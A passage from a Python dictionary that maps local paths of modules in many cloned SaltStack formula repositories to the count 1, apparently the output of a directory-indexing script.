'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/bin/compress': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fab_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fab_tasks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/fab_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/fab_tasks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/fab_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/fab_tasks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands/bshell': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands/cleanup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands/install': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/static/admin/js/compress': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ranl_salt-pillar-linker/linker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rfairburn_salt-nagios-formula/nagios/server/files/cfg_file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rhormaza_salt-common-states/salt/files/module_keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rhormaza_salt-common-states/salt/files/state_keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/docs/_themes/flask_theme_support': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/shaker/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/shaker/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/util/ubuntu_cloud_images': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_graphite-formula/graphite/files/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_hosts-formula/_modules/informer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_salt-docs-formula/sphinxdocs/sphinxdocs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_tomcat-formula/tests/support': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/checker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/harness': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/test_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/aiding': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/bottle': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/test/functional': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/test/functional/config_helper': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/test_server_start': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/digitalocean_metadata': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/ec2_info': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/gce': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/has_battery': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/ansmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/aws_elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/awstats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/basicauth': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/cdpr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/cloudflare': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/fahclient': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/flup_fcgi_client': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/iis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/image': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/iscsistorage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/iscsitarget': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/linux_netconfig': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/linux_netstat': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/nzbget': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/riak': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/smx': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/sysbench': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/syslog_ng': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/system': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/vzctl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/webalizer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/win_update': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/wireunlurk/wireunlurk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/output/flatten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/pillars/lookup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/renderers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/renderers/pyobjects': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/returners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/runners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/runners/event': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/ansible': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/archive': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/bacula': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/iis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_role': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_tenant': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_user_role': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/riak': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/smx': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/syslog_ng': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/win_update': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/zapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-qa/salt/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-qa/salt/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-qa/salt/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-states/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-states/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-states/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/docs/source/_ext/saltconf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/docs/source/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/case': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/cherrypytest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/cherrypytest/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/cherrypytest/case': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/ext': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/ext/console': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/ext/os_data': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/github': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/helpers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/jenkins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/mixins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/mock': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/parser': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/parser/cover': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/fileperms': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/pep263': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/pep8': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_filter_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_imports_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_input_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_map_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_xrange_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_zip_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/smartup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/strings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/runtests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/unit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/xmlunit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-vsx/django-demo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-vsx/django-demo-app/file_root': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltflo/saltflo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_modules/environ': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_modules/github': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_states/environ': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_states/github': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/graphite/files/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-sandbox/_modules/cloud_config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saurabhsurana_salt-stack-demo/ext-pillar/demo_enc_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/scalr-tutorials_scalr-saltstack/scripts/minion-configure': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/serverhorror_test-saltstack/_grains/custom': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/serverhorror_test-saltstack/_grains/roles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/servo_saltfs/buildbot/github_buildbot': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/servo_saltfs/buildbot/master/passwords': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shepax_sqlserver_saltstack/sqlodbc': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shepax_sqlserver_saltstack/sqlserver': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shomodj_salt-states/salt/_modules/mathmagic': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shomodj_salt-states/salt/modoboa/nginx/gunicorn.conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackforge_keystone-salt-formula/_states/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap/commands': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap/jinja': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/svetlyak40wt_salt-firewall-formula/_states/firewall': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/swdream_saltstack/hellowould': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/swdream_saltstack/hellowould/main': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tateeskew_salt-states/graphite/graphite-web/opt/graphite/webapp/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tdf_salt-states-base/_modules/vm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tdf_salt-states-base/_returners/sentry_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tdf_salt-states-base/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/states/_states/shaping': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/tests/unit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thatch45_salt-alert/doc/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thatch45_salt-alert/salt/ext/alert': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thatch45_salt-alert/salt/ext/alert/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/salt/distribute_setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/salt/roots/usr/local/sbin/get-distribute': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/salt/roots/usr/local/sbin/get-pip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/checker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/harness': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/test_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_saltstack-dev-env/scripts/fetch_formulas': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_saltstack-dev-env/scripts/make_formula_links': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/_returners/mongo_saltpad_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/default_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/local_settings.sample': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tonthon_salt-introduction/source/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/torhve_states/wsproxy/websocket': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/trebuchet-deploy_trebuchet/modules/deploy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/trebuchet-deploy_trebuchet/returners/deploy_redis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tricoder42_age-of-saltstack/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/vinta_HeelsFetishism-Deployment/salt/scrapy/settings_prod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/virtru-ops_masterless/masterless': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/virtru-ops_masterless/masterless/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wcannon_saltstack-related/_grains/drives': 1,
